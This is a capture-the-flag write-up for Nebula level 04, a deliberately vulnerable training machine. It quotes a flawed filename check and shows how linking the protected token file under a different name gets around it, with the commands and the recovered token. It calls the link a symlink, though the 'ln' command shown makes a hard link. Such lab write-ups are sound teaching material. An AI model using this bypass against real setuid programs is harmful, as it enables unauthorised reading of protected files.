Exploit-Education Nebula Level 04
Exploit Education Level 4
Challenge
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it
To do this level, log in as the level04
account with the password level04
. Files for this level can be found in /home/flag04.
Vulnerabilty
The program looks for the string token
in the file name.
if(strstr(argv[1], "token") != NULL) {
printf("You may not access '%s'\n", argv[1]);
exit(EXIT_FAILURE);
We can beat this check by creating a symlink to the file token using a file name that does not have token
in it
level04@nebula:~$ ln /home/flag04/token /home/level04/flag
level04@nebula:~$ ls
flag flag04 token
Symlink created. lets run the program now.
level04@nebula:~$ cd /home/flag04
level04@nebula:/home/flag04$ ./flag04 /home/level04/flag
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ su - flag04
Password:
flag04@nebula:~$ getflag
You have successfully executed getflag on a target account
flag04@nebula:~$